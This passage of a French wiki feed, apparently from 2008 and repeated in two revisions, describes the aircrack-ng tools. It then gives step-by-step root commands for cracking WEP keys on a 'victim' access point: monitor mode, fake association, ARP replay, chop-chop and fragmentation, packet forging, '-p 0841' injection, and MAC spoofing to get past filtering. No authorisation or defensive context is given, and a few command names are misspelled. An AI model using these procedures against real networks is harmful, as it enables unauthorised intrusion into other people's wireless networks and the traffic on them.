=== airodump-ng ===&lt;br /&gt;
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.&lt;br /&gt;
&lt;br /&gt;
=== airserv-ng ===&lt;br /&gt;
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.&lt;br /&gt;
&lt;br /&gt;
=== airolib-ng ===&lt;br /&gt;
Permet de créer une base de données sqlite en vue d'un crack WPA.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''&lt;br /&gt;
&lt;br /&gt;
=== airtun-ng ===&lt;br /&gt;
&lt;br /&gt;
=== buddy-ng ===&lt;br /&gt;
A utiliser avec easside-ng&lt;br /&gt;
&lt;br /&gt;
=== easside-ng ===&lt;br /&gt;
Outil &amp;quot;auto-magic&amp;quot; permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.&lt;br /&gt;
&lt;br /&gt;
=== ivstools ===&lt;br /&gt;
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.&lt;br /&gt;
&lt;br /&gt;
=== makeivs ===&lt;br /&gt;
Permet de créer un fichier .ivs à partir d'une clé WEP connue.&lt;br /&gt;
&lt;br /&gt;
=== packetforge-ng ===&lt;br /&gt;
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).&lt;br /&gt;
&lt;br /&gt;
=== tkiptun-ng ===&lt;br /&gt;
Permet d'aider au crack de clés WPA utilisant TKIP.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''&lt;br /&gt;
&lt;br /&gt;
=== wesside-ng ===&lt;br /&gt;
Outil permettant l'automatisation du crack de clé WEP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les différents types d'attaques ==&lt;br /&gt;
'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''&lt;br /&gt;
&amp;lt;br /&amp;gt;Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type &amp;quot;macchanger --mac $mac $iface&amp;quot;, et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Légende ===&lt;br /&gt;
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)&lt;br /&gt;
&amp;lt;br /&amp;gt;$canal = canal wifi à utiliser (colonne &amp;quot;CH&amp;quot; dans airodump-ng)&lt;br /&gt;
&amp;lt;br /&amp;gt;$bssid_cible = BSSID du point d'acces ciblé&lt;br /&gt;
&amp;lt;br /&amp;gt;$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne &amp;quot;STATION&amp;quot; dans airodump-ng)&lt;br /&gt;
&lt;br /&gt;
=== Mac spoofing ===&lt;br /&gt;
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt;macchanger --mac $mac $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;ARP replay&amp;quot; ===&lt;br /&gt;
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''&lt;br /&gt;
* Mettre carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;30 = temps d'attente entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-3 = attaque ARP replay&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&lt;br /&gt;
=== Methode &amp;quot;chop-chop&amp;quot; et par fragmentation ===&lt;br /&gt;
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfice à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* Attaque:&lt;br /&gt;
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.&lt;br /&gt;
&amp;lt;br /&amp;gt;Dans les 2 cas, un fichier .xor sera créé en cas de succès.&lt;br /&gt;
** Par fragmentation:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-5 = attaque par fragmentation&lt;br /&gt;
** Chop-chop:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-4 = attaque chop-chop&lt;br /&gt;
&lt;br /&gt;
* Création d'un paquet ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = générer un paquet ARP&lt;br /&gt;
&amp;lt;br /&amp;gt;-k = IP de destination (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-l = IP source (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = nom du fichier dans lequel mettre le paquet ARP&lt;br /&gt;
&lt;br /&gt;
* Injection de l'ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -r $fichier_arp $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = selection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;-p 0841&amp;quot; ===&lt;br /&gt;
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en mode monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à la station:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succès, &amp;quot;Association successful :-)&amp;quot; doit s'afficher&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = sélection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;/div&gt;</summary>
		<author><name>Mattoufoutu</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=Aircrack-ng</id>
		<title>Aircrack-ng</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Aircrack-ng"/>
				<updated>2008-12-18T19:32:06Z</updated>
		
		<summary type="html">&lt;p&gt;Mattoufoutu&amp;nbsp;:&amp;#32;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Les outils de la suite aircrack ==&lt;br /&gt;
&lt;br /&gt;
=== aircrack-ng ===&lt;br /&gt;
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.&lt;br /&gt;
&lt;br /&gt;
=== airbase-ng ===&lt;br /&gt;
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au &amp;quot;fake-ap&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
=== airdecap-ng ===&lt;br /&gt;
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.&lt;br /&gt;
&lt;br /&gt;
=== airdecloak-ng ===&lt;br /&gt;
Sert à décloaker (démasquer) les bssid cloakés&lt;br /&gt;
&lt;br /&gt;
=== airdriver-ng ===&lt;br /&gt;
Sert à compiler, dés/installer les drivers appropriés à votre carte.&lt;br /&gt;
&lt;br /&gt;
=== aireplay-ng ===&lt;br /&gt;
Sert à injecter des paquets et à s'authentifier auprès des AP.&lt;br /&gt;
&lt;br /&gt;
=== airmon-ng ===&lt;br /&gt;
Sert à dés/activer le mode monitor sur votre carte.&lt;br /&gt;
&lt;br /&gt;
=== airodump-ng ===&lt;br /&gt;
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.&lt;br /&gt;
&lt;br /&gt;
=== airserv-ng ===&lt;br /&gt;
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.&lt;br /&gt;
&lt;br /&gt;
=== airolib-ng ===&lt;br /&gt;
Permet de créer une base de données sqlite en vue d'un crack WPA.&lt;br /&gt;
&amp;lt;br /&amp;gt;ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.&lt;br /&gt;
&lt;br /&gt;
=== airtun-ng ===&lt;br /&gt;
&lt;br /&gt;
=== buddy-ng ===&lt;br /&gt;
A utiliser avec easside-ng&lt;br /&gt;
&lt;br /&gt;
=== easside-ng ===&lt;br /&gt;
Outil &amp;quot;auto-magic&amp;quot; permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.&lt;br /&gt;
&lt;br /&gt;
=== ivstools ===&lt;br /&gt;
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.&lt;br /&gt;
&lt;br /&gt;
=== makeivs ===&lt;br /&gt;
Permet de créer un fichier .ivs à partir d'une clé WEP connue.&lt;br /&gt;
&lt;br /&gt;
=== packetforge-ng ===&lt;br /&gt;
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).&lt;br /&gt;
&lt;br /&gt;
=== tkiptun-ng ===&lt;br /&gt;
Permet d'aider au crack de clés WPA utilisant TKIP.&lt;br /&gt;
&amp;lt;br /&amp;gt;ATTENTION: Cet outil n'est pas encore fonctionnel.&lt;br /&gt;
&lt;br /&gt;
=== wesside-ng ===&lt;br /&gt;
Outil permettant l'automatisation du crack de clé WEP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les différents types d'attaques ==&lt;br /&gt;
TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT&lt;br /&gt;
&amp;lt;br /&amp;gt;Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type &amp;quot;macchanger --mac $mac $iface&amp;quot;, et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Légende ===&lt;br /&gt;
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)&lt;br /&gt;
&amp;lt;br /&amp;gt;$canal = canal wifi à utiliser (colonne &amp;quot;CH&amp;quot; dans airodump-ng)&lt;br /&gt;
&amp;lt;br /&amp;gt;$bssid_cible = BSSID du point d'acces ciblé&lt;br /&gt;
&amp;lt;br /&amp;gt;$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne &amp;quot;STATION&amp;quot; dans airodump-ng)&lt;br /&gt;
&lt;br /&gt;
=== Mac spoofing ===&lt;br /&gt;
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:&lt;br /&gt;
&amp;lt;br /&amp;gt;macchanger --mac $mac $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;ARP replay&amp;quot; ===&lt;br /&gt;
* Mettre carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;Couper une fois la victime trouvée&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVS:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;Laisser tourner...&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;30 = temps d'attente entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher (si affiché sans le smiley, attendre)&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-3 = attaque ARP replay&lt;br /&gt;
&amp;lt;br /&amp;gt;Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;/div&gt;</summary>
		<author><name>Mattoufoutu</name></author>	</entry>

	</feed>